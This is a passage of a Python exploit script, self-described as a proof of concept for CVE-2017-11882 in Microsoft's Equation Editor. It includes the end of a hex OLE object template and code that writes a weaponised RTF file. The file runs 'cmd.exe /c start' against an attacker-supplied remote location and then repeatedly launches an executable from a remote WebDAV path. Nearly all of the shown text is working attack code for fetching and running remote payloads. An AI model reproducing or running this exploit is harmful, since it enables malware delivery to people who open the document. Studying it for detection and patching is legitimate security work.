108 | 00000000000000ffffffffffffffffffffffff000000000000000000000000000000000000000000
109 | 00000000000000000000000000000000000000000000000000000001050000050000000d0000004d
110 | 45544146494c4550494354003421000035feffff9201000008003421cb010000010009000003c500
111 | 000002001c00000000000500000009020000000005000000020101000000050000000102ffffff00
112 | 050000002e0118000000050000000b0200000000050000000c02a001201e1200000026060f001a00
113 | ffffffff000010000000c0ffffffc6ffffffe01d0000660100000b00000026060f000c004d617468
114 | 54797065000020001c000000fb0280fe0000000000009001000000000402001054696d6573204e65
115 | 7720526f6d616e00feffffff6b2c0a0700000a0000000000040000002d0100000c000000320a6001
116 | 90160a000000313131313131313131310c000000320a6001100f0a00000031313131313131313131
117 | 0c000000320a600190070a000000313131313131313131310c000000320a600110000a0000003131
118 | 31313131313131310a00000026060f000a00ffffffff0100000000001c000000fb02100007000000
119 | 0000bc02000000000102022253797374656d000048008a0100000a000600000048008a01ffffffff
120 | 7cef1800040000002d01010004000000f0010000030000000000
121 | """
122 | 
123 | 
124 | COMMAND_OFFSET = 0x949*2
125 | 
126 | 
127 | def create_ole_exec_primitive(command):
128 |     if len(command) > 43:
129 |         raise ValueError("primitive command must be shorter than 43 bytes")
130 |     hex_command = command.encode("hex")
131 |     objdata_hex_stream = OBJDATA_TEMPLATE.translate(None, "\r\n")
132 |     ole_data = objdata_hex_stream[:COMMAND_OFFSET] + hex_command + objdata_hex_stream[COMMAND_OFFSET + len(hex_command):]
133 |     return OBJECT_HEADER + ole_data + OBJECT_TRAILER
134 | 
135 | 
136 | def create_rtf(header, trailer, remote_location, remote_file):
137 |     ole1 = create_ole_exec_primitive("cmd.exe /c start " + remote_location + " &")
138 |     ole2 = create_ole_exec_primitive(remote_file + " &")
139 |     # We need 2 or more commands for executing remote file from WebDAV
140 |     # because WebClient service start may take some time
141 |     return header + ole1 + ole2 + ole2 + ole2 + trailer
142 | 
143 | 
144 | if __name__ == '__main__':
145 |     parser = argparse.ArgumentParser(description="PoC for CVE-2017-11882")
146 |     parser.add_argument("-u", "--url", help="Remote location to trigger WebClient service", required=True)
147 |     parser.add_argument("-e", "--executable", help="Remote executable in WebDAV path", required=True)
148 |     parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)
149 | 
150 |     args = parser.parse_args()
151 | 
152 |     rtf_content = create_rtf(RTF_HEADER, RTF_TRAILER, args.url, args.executable)
153 | 
154 |     output_file = open(args.output, "w")
155 |     output_file.write(rtf_content)
156 | 
157 |     print "!!! Completed !!!"
158 | 


--------------------------------------------------------------------------------